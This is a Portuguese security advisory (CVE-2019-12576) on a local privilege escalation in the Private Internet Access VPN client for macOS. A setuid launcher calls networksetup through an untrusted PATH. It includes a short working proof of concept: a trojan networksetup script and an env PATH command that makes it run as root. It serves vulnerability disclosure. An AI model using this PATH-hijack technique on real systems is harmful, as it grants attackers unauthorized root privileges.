ASA-2019-00382 – London Trust Media Private Internet Access: Untrusted Search Path


For the English version of this alert, click here.

Allele Security Alert

ASA-2019-00382

Identificador(es)

ASA-2019-00382, CVE-2019-12576

Título

Untrusted Search Path

Fabricante(s)

London Trust Media, Inc

Produto(s)

Private Internet Access (PIA) VPN Client

Versão(ões) afetada(s)

Private Internet Access (PIA) VPN Client para macOS versão v82

Versão(ões) corrigida(s)

Private Internet Access (PIA) VPN Client para macOS versão v1.2.1+

Prova de conceito

Sim

Descrição

Uma vulnerabilidade no Private Internet Access (PIA) VPN Client para macOS versão v82 poderia permitir que um atacante local autenticado executasse um código arbitrário com privilégios elevados.

Detalhes técnicos

O binário openVpn_launcher do macOS PIA é root setuid. Este programa é chamado durante o processo de conexão e executa vários utilitários do sistema operacional para configurar o sistema. O utilitário networksetup é chamado usando caminhos relativos. Um usuário local sem privilégios pode executar comandos arbitrários como root criando um trojan networksetup que será executado durante o processo de conexão. Isso é possível porque o ambiente PATH não é redefinido antes de executar o utilitário do sistema operacional.

Todas as etapas são executadas como um usuário com poucos privilégios.

Etapa 1 – Crie um script chamado networksetup com as duas linhas a seguir. Este PoC enviará a saída do comando id para a parede. Isso mostrará que está sendo executado com privilégios de root (uid=0).

#!/bin/sh
echo "$0: $(/usr/bin/id)"|/usr/bin/wall

Passo 2 – Faça o script networksetup executável.

chmod 755 networksetup

Etapa 3 – Execute run.sh para abrir o cliente PIA GUI enquanto preenche o diretório de trabalho atual ($PWD) para a variável de ambiente PATH. Isso garante que o script trojan networksetup seja executado primeiro porque os caminhos relativos são usados.

env "PATH=$PWD:$PATH" /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh

Etapa 4 – Faça o login e conecte-se à VPN

Durante o processo de conexão, o networksetup será executado como root e uma mensagem do wall será exibida mostrando a saída do comando id com uid=0.

Créditos

Rich Mirch

Referência(s)

PIA macOS Privilege Escalation: Untrusted Search Path
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12576.txt

CVE-2019-12576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12576

CVE-2019-12576
https://nvd.nist.gov/vuln/detail/CVE-2019-12576

Se encontrou algum erro neste alerta ou deseja uma análise compreensiva, entre em contato.

Última modificação: 26 junho 2019

Não somos responsáveis por qualquer perda de dados, corrupção de dispositivos ou qualquer outro tipo de problema devido ao uso de qualquer informação mencionada em nossos alertas de segurança.